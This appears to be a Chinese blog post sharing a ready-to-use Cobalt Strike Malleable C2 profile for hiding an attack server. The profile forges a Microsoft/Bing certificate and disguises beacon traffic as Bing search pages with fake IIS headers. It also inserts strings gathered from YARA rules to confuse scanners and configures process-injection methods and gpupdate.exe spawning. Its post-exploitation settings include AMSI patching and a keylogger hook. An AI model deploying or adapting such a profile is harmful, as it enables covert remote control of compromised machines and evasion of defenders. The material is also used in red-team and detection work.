CobaltStrike Profile文件模板

CS服务器隐匿

#替代默认ssl.store证书,自签ssl证书
https-certificate {
    # 使用真实有效的SSL证书则只需用keystore和password
    # set keystore "密钥库文件";
    # set password "密码库文件密码"
        set CN       "www.bing.com";
        set O        "Microsoft Corporation";
        set C        "US";
        set L        "Redmond";
        set OU       "Microsoft IT";
        set ST       "WA";
        set validity "365";
}
# 表明这是默认的 Beacon 配置文件
set sample_name "ExterminateDog";
# 设置睡眠时间为 60000 (默认为 60 秒)
set sleeptime "30000";
# 默认回连的抖动因子 0-99% [随机化回调时间]
set jitter "0";
set dns_idle "8.8.8.8";
# 在 DNS A 记录请求中发送的最大字节数,可以使 DNS Beacon 发送数据看起来比较正常
set maxdns "235";
# 设置每次发送请求的用户代理UA
set useragent "Mozilla/5.0 (Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
set pipename "mypipe-f##";
set pipename_stager "mypipe-h##";
# 控制Beacon DLL如何加载到内存中并编辑Beacon DLL的内容
stage {
    # 要求 Beacon 尝试释放与初始化它的反射 DLL 包关联的内存
    set cleanup         "true";
    set checksum        "0";
    set entry_point     "134733";
    set image_size_x86  "512000";
    set image_size_x64  "512000";
    set name            "Gtmdusa.dll";
    set rich_header    "/x63/x02/x25/x0f/x27/x63/x4b/x5c/x27/x63/x4b/x5c/x27/x63/x4b/x5c/x9a/x2c/xdd/x5c/x24/x63/x4b/x5c/x2e/x1b/xde/x5c/x3b/x63/x4b/x5c/x2e/x1b/xcf/x5c/x1b/x63/x4b/x5c/x2e/x1b/xc8/x5c/x8f/x63/x4b/x5c/x00/xa5/x30/x5c/x28/x63/x4b/x5c/x27/x63/x4a/x5c/x97/x63/x4b/x5c/x2e/x1b/xc1/x5c/x60/x63/x4b/x5c/x2e/x1b/xd9/x5c/x26/x63/x4b/x5c/x39/x31/xdf/x5c/x26/x63/x4b/x5c/x2e/x1b/xda/x5c/x26/x63/x4b/x5c/x52/x69/x63/x68/x27/x63/x4b/x5c/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00";

    # 内存中轻微混淆Beacon DLL
    set stomppe        "false";
    # make these things havex-ish
    transform-x86 {
        strrep "ReflectiveLoader" "RunDllEntry";
        strrep "sos.dll"       "";
    }
    transform-x64 {
        strrep "ReflectiveLoader" "RunDllEntry";
        strrep "sos.x64.dll"   "";
    }
    # strings gathered from Yara rules and sandbox string dumps
    stringw "%s <%s> (Type=%i, Access=%i, ID='%s')";
    stringw "%02i was terminated by ThreadManager(2)/n";
    stringw "main sort initialise ..../../../../img/n";
    stringw "qsort [0x%x, 0x%x] done %d this %d/n";
    stringw "{0x%08x, 0x%08x}";
    stringw "Programm was started at %02i:%02i:%02i/n";
    stringw "a+";
    stringw "%02i:%02i:%02i.%04i:";
    stringw "**************************************************************************/n";
    stringw "Start finging of LAN hosts..../../../../img/n";
    stringw "Finding was fault. Unexpective error/n";
    stringw "Hosts was't found../../../../img/n";
    stringw "/t/t/t/t/t%O2i) [%s]/n";
    stringw "Start finging of OPC Servers...";
    stringw "Was found %i OPC Servers.";
    stringw "/t/t%i) [%s//%s]/n/t/t/tCLSID:          %s/n";
    stringw "/t/t/tUserType:        %s/n/t/t/tVerIndProgID:    %s/n";
    stringw "OPC Servers not found. Programm finished";
    stringw "Start finging of OPC Tags...";
    stringw "[-]Threads number > Hosts number";
    stringw "[-]Can not get local ip";
    stringw "[!]Start";
    stringw "[+]Get WSADATA";
    stringw "[+]Local:"; 
    stringw "[-]Connection error";
    stringw "Was found %i hosts in LAN:";
    stringw "%s[%s]!!!EXEPTION %i!!!";
    stringw "final combined CRC = 0x%08x";
}
# 为HTTP GET定义指标,仅对通信过程中的GET请求有效
http-get {
    # Beacon将从这个URI池中随机选择一个作为通信时使用的URL(如果提供了多个URI)
    set uri "/search/";
    # 客户端响应规则
    client {
        #使用header设置http响应头字段
        header "Host" "www.bing.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Cookie" "MUID=20798CDBA7526BE709939C67A67C6ABD; _EDGE_S=F=1&SID=0D72DD12F8986C1D3C96CDAEF9B66D85; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=4E021D8EBD484402BBD21AE8C3DB5A41&dmnchg=1;";
        # base64 编码会话元数据并将其存储在Cookie标头中
        metadata {
            base64url;
            # 将数据存储在指定的URL参数q中
            parameter "q";
        }
        parameter "go" "Search";
        parameter "qs" "bs";
        parameter "form" "QBRE";
    }
    # 服务端响应规则
    server {
        # 服务端应该发送没有更改的输出
        header "Server" "Microsoft-IIS/8.5";
        header "Cache-Control" "private, max-age=0";
        header "Content-Type" "text/html; charset=utf-8";
        header "Keep-Alive" "timeout=3, max=100";
        header "Connection" "close";
        header "Vary" "Accept-Encoding";
        # 通过output代码块设置返回数据的编码规则
        output {
            base64;
            prepend "<!DOCTYPE html><html lang=/"en/" xml:lang=/"en/" xmlns=/"http://www.w3.org/1999/xhtml/" xmlns:Web=/"http://schemas.live.com/Web//"><script type=/"text/javascript/">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=/"text/html; charset=utf-8/" http-equiv=/"content-type/" /><link href=/"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE/" rel=/"alternate/" title=/"XML/" type=/"text/xml/" /><link href=/"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE/" rel=/"alternate/" title=/"RSS/" type=/"application/rss+xml/" /><link href=/"/sa/simg/bing_p_rr_teal_min.ico/" rel=/"shortcut icon/" /><script type=/"text/javascript/">//<![CDATA[";
            append "G={ST:(si_ST?si_ST:new Date),Mkt:/"en-US/",RTL:false,Ver:/"53/",IG:/"4C1158CCBAFC4896AD78ED0FF0F4A1B2/",EventID:/"E37FA2E804B54C71B3E275E9589590F8/",MN:/"SERP/",V:/"web/",P:/"SERP/",DA:/"CO4/",SUIH:/"OBJhNcrOC72Z3mr21coFQw/",gpUrl:/"/fd/ls/GLinkPing.aspx?/" }; _G.lsUrl=/"/fd/ls/l?IG=/"+_G.IG ;curUrl=/"http://www.bing.com/search/";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+/"IG=/"+_G.IG+/"&/"+a;}return true;};//]]></script><style type=/"text/css/">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
            # output代码块需要一个关键字来表示编码规则终止,使用print表示直接输出放到body中
            print;
        }
    }
}
# 为HTTP POST定义指标,仅对通信过程中的POST请求有效
http-post {
    # 同上,Beacon会从这个URI池中随机选择一个作为通信时使用的URL(如果提供了多个URI)
    set uri "/Search/";
    client {
        header "Host" "www.bing.com";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        header "Cookie" "MUID=20798CDBA7526BE709939C67A67C6ABD; _EDGE_S=F=1&SID=0D72DD12F8986C1D3C96CDAEF9B66D85; _EDGE_V=1; SRCHD=AF=NOFORM; SRCHUID=V=2&GUID=4E021D8EBD484402BBD21AE8C3DB5A41&dmnchg=1;";
        # 将我们的会话标识符传输为 /search?q=[identifier]
        # 任务id由此代码块控制
        id {
            base64url;
            parameter "form";
        }
        parameter "go" "Search";
        parameter "qs" "bs";
        # 在没有实际更改的情况下POST我们的输出
        output {
            # 变异Base64编码
            base64url;
            # 将数据存储在指定的URL参数q中
            parameter "q";
        }
    }
    # 服务端对 HTTP POST 的响应
    server {
        header "Cache-Control" "no-cache";
        header "Keep-Alive" "timeout=3, max=100";
        header "Cache-Control" "private, max-age=0";
        header "Content-Type" "text/html; charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "Server" "Microsoft-IIS/8.5";
        header "Connection" "close";
        output {
            netbios;
            base64;
            prepend "<!DOCTYPE html><html lang=/"en/" xml:lang=/"en/" xmlns=/"http://www.w3.org/1999/xhtml/" xmlns:Web=/"http://schemas.live.com/Web//"><script type=/"text/javascript/">//<![CDATA[si_ST=new Date;//]]></script><head><!--pc--><title>Bing</title><meta content=/"text/html; charset=utf-8/" http-equiv=/"content-type/" /><link href=/"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE/" rel=/"alternate/" title=/"XML/" type=/"text/xml/" /><link href=/"/search?format=rss&q=canary&go=Search&qs=bs&form=QBRE/" rel=/"alternate/" title=/"RSS/" type=/"application/rss+xml/" /><link href=/"/sa/simg/bing_p_rr_teal_min.ico/" rel=/"shortcut icon/" /><script type=/"text/javascript/">//<![CDATA[";
            append "G={ST:(si_ST?si_ST:new Date),Mkt:/"en-US/",RTL:false,Ver:/"53/",IG:/"4C1158CCBAFC4896AD78ED0FF0F4A1B2/",EventID:/"E37FA2E804B54C71B3E275E9589590F8/",MN:/"SERP/",V:/"web/",P:/"SERP/",DA:/"CO4/",SUIH:/"OBJhNcrOC72Z3mr21coFQw/",gpUrl:/"/fd/ls/GLinkPing.aspx?/" }; _G.lsUrl=/"/fd/ls/l?IG=/"+_G.IG ;curUrl=/"http://www.bing.com/search/";function si_T(a){ if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+/"IG=/"+_G.IG+/"&/"+a;}return true;};//]]></script><style type=/"text/css/">.sw_ddbk:after,.sw_ddw:after,.sw_ddgn:after,.sw_poi:after,.sw_poia:after,.sw_play:after,.sw_playa:after,.sw_playd:after,.sw_playp:after,.sw_st:after,.sw_sth:after,.sw_ste:after,.sw_st2:after,.sw_plus:after,.sw_tpcg:after,.sw_tpcw:after,.sw_tpcbk:after,.sw_arwh:after,.sb_pagN:after,.sb_pagP:after,.sw_up:after,.sw_down:after,.b_expandToggle:after,.sw_calc:after,.sw_fbi:after,";
            print;
        }
    }
}
# 此代码块用来控制stage(Beacon核心代码)发送过程
http-stager {
    set uri_x86 "/rpc";
    set uri_x64 "/Rpc";
    client {
        header "Accept" "*/*";
        }
    server {
        header "Cache-Control" "private, max-age=0";
            header "Content-Type" "text/html; charset=utf-8";
            header "Vary" "Accept-Encoding";
            header "Server" "Microsoft-IIS/8.5";
            header "Connection" "close";
        }
}
# 此代码块可对进程注入相关的内容进行配置,控制注入相关的行为
process-inject {
    # CreateRemoteThread;
    # 在远程进程中分配内存的首选方法
        set allocator "NtMapViewOfSection";     
    # 请求注入内容的最小内容量
        set min_alloc "16700";
    # 使用RWX作为注入内容的最终权限 替代方案是RX
        set userwx "false";  
        # 使用RWX作为注入内容的初始权限 替代方案是RW
        set startrwx "true";
        # 向Beacon注入的内容里添加东西
    transform-x86 {
        # prepend "/x90/x90/x90";
    }
    transform-x64 {
        # prepend "/x90/x90/x90";
    }
    # 此代码块控制Beacon在进程注入时要使用的方法
    execute {
        #CreateThread;
        #CreateRemoteThread;       
        CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
        SetThreadContext;
        NtQueueApcThread-s;
        #NtQueueApcThread;
        CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
        RtlCreateUserThread;
    }
}
# 此代码块控制了Cobalt Strike的后渗透任务的具体内容和行为。
post-ex {
    # 控制后渗透功能生成的临时进程
    set spawnto_x86 "%windir%//syswow64//gpupdate.exe";
    set spawnto_x64 "%windir%//sysnative//gpupdate.exe";
    # 混淆post-ex DLL内容
        set obfuscate "true";
    # 指示Beacon将关键函数指针(如GetProcAddress和LoadLibrary)嵌入到同架构的post-ex DLL中
        set smartinject "true";
    # 选项指示powerpick、execute-assembly和psinject在加载.NET或PowerShell代码之前-
    # -对AmsiScanBuffer函数进行修补。(限制反恶意软件扫描接口)
        set amsi_disable "true";
        # 允许多线程的post-ex DLL使用线程地址欺骗
        set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
        # 更改通信时使用的命名管道的名字
        set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
        # Cobalt Strike的键盘记录器使用的函数
        set keylogger "SetWindowsHookEx";
}
赞(0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址